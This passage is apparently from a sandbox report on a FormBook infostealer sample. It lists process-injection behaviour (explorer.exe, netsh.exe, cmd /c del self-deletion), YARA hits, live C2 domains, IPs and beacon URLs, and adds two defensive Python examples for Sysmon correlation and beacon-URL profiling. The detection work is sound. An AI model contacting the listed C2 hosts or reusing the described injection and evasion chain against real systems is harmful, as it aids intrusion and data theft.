Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000005.00000000.253495727.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000005.00000002.504712950.0000000001640000.00000002.00000001.sdmp, netsh.exe, 0000000F.00000002.506939015.0000000004270000.00000002.00000001.sdmp Binary or memory string: Progmanlock
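Read together, the injection lines above describe one chain: the sample maps sections into explorer.exe (PID 3472 in this run), sets a thread context and queues an APC there; the injected explorer.exe then resolves and connects to the C2 hosts and starts netsh.exe with no arguments at all (command line identical to the image path); netsh.exe receives the payload the same way and finally runs `cmd.exe /c del` on the original file. Two details matter for detection: this sample never calls CreateRemoteThread, so a rule keyed only on Sysmon Event ID 8 misses it, whereas the cross-process write that precedes the APC and SetThreadContext shows up as Event ID 10 (ProcessAccess) with VM_OPERATION/VM_WRITE rights; and neither explorer.exe talking to the network nor netsh.exe starting is suspicious on its own, so the value is in correlating them. The following Python is an added example, not part of the report: it replays constructed Sysmon-style events that mirror the report's process tree (PID 3472 is from the report, every other PID and the event layout are made up) and raises one finding per link in the chain while leaving a netsh.exe invocation with real arguments alone.

```python
"""Correlate the injected-explorer.exe -> netsh.exe -> cmd.exe chain from Sysmon-style events.

Added example for the injection section above; the events are constructed, not sandbox output.
"""

# Rights in Sysmon Event ID 10 GrantedAccess that let the caller write another process' memory.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
WRITE_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

SAMPLE = r"C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe"
EXPLORER = r"C:\Windows\explorer.exe"
NETSH = r"C:\Windows\SysWOW64\netsh.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

# Constructed events in time order. explorer.exe PID 3472 is the "target process: 3472" from
# the report; PIDs 2200, 4100, 4120, 5000 and 6000 are invented for the example.
EVENTS = [
    {"EventID": 1, "ProcessId": 2200, "Image": SAMPLE, "CommandLine": f'"{SAMPLE}"',
     "ParentProcessId": 3472, "ParentImage": EXPLORER},
    {"EventID": 10, "SourceProcessId": 2200, "SourceImage": SAMPLE,
     "TargetProcessId": 3472, "TargetImage": EXPLORER, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 3, "ProcessId": 3472, "Image": EXPLORER, "DestinationHostname": "www.chjcsc.com",
     "DestinationIp": "172.255.115.89", "DestinationPort": 80},
    {"EventID": 1, "ProcessId": 4100, "Image": NETSH, "CommandLine": NETSH,
     "ParentProcessId": 3472, "ParentImage": EXPLORER},
    {"EventID": 1, "ProcessId": 4120, "Image": CMD, "CommandLine": f'/c del "{SAMPLE}"',
     "ParentProcessId": 4100, "ParentImage": NETSH},
    # Benign control: an administrator running netsh with a real subcommand from a console.
    {"EventID": 1, "ProcessId": 5000, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall show allprofiles",
     "ParentProcessId": 6000, "ParentImage": CMD},
]


def _is(image: str, name: str) -> bool:
    """Case-insensitive match on the image file name."""
    return image.lower().endswith("\\" + name)


def _under_windows(image: str) -> bool:
    return image.lower().startswith("c:\\windows\\")


def detect(events):
    """Walk events in time order and return (rule, pid) findings.

    Correlation state: a process that another image opened with write rights is marked
    'injected'; its later network connections and child processes are then escalated.
    """
    findings, injected = [], set()
    for e in events:
        eid = e["EventID"]
        if eid == 10:
            cross_image = e["SourceImage"].lower() != e["TargetImage"].lower()
            can_write = int(e["GrantedAccess"], 16) & WRITE_MASK
            if cross_image and can_write and _under_windows(e["TargetImage"]):
                injected.add(e["TargetProcessId"])
                findings.append(("write_access_to_system_process", e["TargetProcessId"]))
        elif eid == 3 and e["ProcessId"] in injected:
            findings.append(("injected_process_network_connect", e["ProcessId"]))
        elif eid == 1:
            image = e["Image"]
            cmd = e["CommandLine"].strip().strip('"')
            if e["ParentProcessId"] in injected:
                findings.append(("child_of_injected_process", e["ProcessId"]))
            # netsh started with a command line that is nothing but its own path: no subcommand
            if _is(image, "netsh.exe") and cmd.lower() == image.lower():
                findings.append(("netsh_without_arguments", e["ProcessId"]))
            # netsh has no business deleting files through cmd.exe
            if _is(e["ParentImage"], "netsh.exe") and _is(image, "cmd.exe") and "/c del " in cmd.lower():
                findings.append(("netsh_spawns_cmd_del", e["ProcessId"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:<36} pid={pid}")
```

On a real host the write-access rule needs an allowlist (AV engines, debuggers, accessibility and screen-reader tools all open explorer.exe with broad rights) before it is usable, and explorer.exe does make its own connections for shares and WebDAV, which is why the network rule here only fires for a PID already marked as injected.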

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Queries volume information: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph:

Behavior Graph ID: 411847 | Sample: NEW ORDER SOR 10531220.exe | Start date: 12/05/2021 | Architecture: WINDOWS | Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 11 other signatures

Process tree as drawn in the graph:

NEW ORDER SOR 10531220.exe (started)
    dropped file: C:\Users\...\NEW ORDER SOR 10531220.exe.log (ASCII)
    - NEW ORDER SOR 10531220.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        - explorer.exe (injected)
            network: www.chjcsc.com 172.255.115.89, ports 49725 -> 80, LEASEWEB-USA-SFO-12US, United States; www.theglasshousenyc.com; 2 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit); Uses netsh to modify the Windows network and firewall settings
            - netsh.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                - cmd.exe (started)
                    - conhost.exe (started)
    - NEW ORDER SOR 10531220.exe (started)

Contacted Public IPs

IP             | Domain               | Country       | ASN   | ASN Name              | Malicious
172.255.115.89 | www.chjcsc.com       | United States | 7203  | LEASEWEB-USA-SFO-12US | true
34.102.136.180 | theglasshousenyc.com | United States | 15169 | GOOGLEUS              | false

Contacted Domains

Name                     | IP             | Active
www.chjcsc.com           | 172.255.115.89 | true
theglasshousenyc.com     | 34.102.136.180 | true
www.socialdating24.com   | unknown        | unknown
www.theglasshousenyc.com | unknown        | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.theglasshousenyc.com/nyr/?VBZDH=6l68xBo0LhJD2lv&hRXX=17hAXKnq4LEoTdb/hcwwVfWjS4IYRgMdOmXX52SprwB/nueYqi9a5dgIoxBN3QmuetP3 | false | Avira URL Cloud: safe | unknown
www.magnumopuspro.com/nyr/ | true | Virustotal: 6%; Avira URL Cloud: malware | low
http://www.chjcsc.com/nyr/?hRXX=pvzb7SsULo7Y2vRo6lGAqy8tja7/7li767PDw0IqJEj7KBKEBSl8rkLevIquA9l06aH5&VBZDH=6l68xBo0LhJD2lv | true | Avira URL Cloud: safe | unknown
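The three URLs share the `/nyr/` directory and, where a query string is present, the same two parameter names (VBZDH and hRXX) with an identical VBZDH value, while the per-URL reputation verdicts disagree (Avira rates the two full beacon URLs "safe" and only the bare magnumopuspro.com path "malware"). FormBook beacons to a configured list of domains of which typically only one is the live C2, so the shared shape of the request is a better pivot than any single domain or vendor verdict, with the caveat that the path token and parameter names are generated per build and therefore only identify this campaign. The following Python is an added example, not part of the report: it parses the report's URLs into the parts worth pivoting on, builds a campaign profile from them, and matches new URLs against it. The `decoy.example` URLs in the test are made up.

```python
"""Build a beacon profile from the contacted URLs and match new URLs against it.

Added example for the "Contacted URLs" table above; REPORT_URLS are copied from the report.
"""
from urllib.parse import urlsplit, parse_qsl

REPORT_URLS = [
    "http://www.theglasshousenyc.com/nyr/?VBZDH=6l68xBo0LhJD2lv&hRXX=17hAXKnq4LEoTdb/hcwwVfWjS4IYRgMdOmXX52SprwB/nueYqi9a5dgIoxBN3QmuetP3",
    "www.magnumopuspro.com/nyr/",
    "http://www.chjcsc.com/nyr/?hRXX=pvzb7SsULo7Y2vRo6lGAqy8tja7/7li767PDw0IqJEj7KBKEBSl8rkLevIquA9l06aH5&VBZDH=6l68xBo0LhJD2lv",
]


def parse_beacon(url: str) -> dict:
    """Split a beacon URL into host, first path token, and query parameters."""
    if "://" not in url:            # the report lists one URL without a scheme
        url = "http://" + url
    parts = urlsplit(url)
    path = parts.path.strip("/")
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return {
        "host": parts.hostname,
        "path_token": path.split("/")[0] if path else "",
        "param_keys": tuple(sorted(params)),
        "params": params,
    }


def campaign_profile(urls) -> dict:
    """Aggregate what the beacons have in common: hosts, path tokens, parameter names,
    and any parameter whose value is identical in every URL that carries it."""
    parsed = [parse_beacon(u) for u in urls]
    values_seen = {}
    for p in parsed:
        for key, value in p["params"].items():
            values_seen.setdefault(key, set()).add(value)
    return {
        "hosts": sorted(p["host"] for p in parsed),
        "path_tokens": sorted({p["path_token"] for p in parsed}),
        "param_key_sets": sorted({p["param_keys"] for p in parsed if p["param_keys"]}),
        "constant_params": {k: next(iter(v)) for k, v in values_seen.items() if len(v) == 1},
    }


def matches_profile(url: str, profile: dict) -> bool:
    """True for a known host, or for an unknown host that reuses the path token and parameter names."""
    p = parse_beacon(url)
    if p["host"] in profile["hosts"]:
        return True
    return p["path_token"] in profile["path_tokens"] and p["param_keys"] in profile["param_key_sets"]


if __name__ == "__main__":
    profile = campaign_profile(REPORT_URLS)
    for key, value in profile.items():
        print(f"{key}: {value}")
```

The profile is what you would push to a proxy or DNS log search: any host is interesting if it is in the host list, and an unknown host becomes interesting as soon as a request to it has the `/nyr/` token with exactly the VBZDH/hRXX pair, regardless of what URL reputation services say about that host on its own.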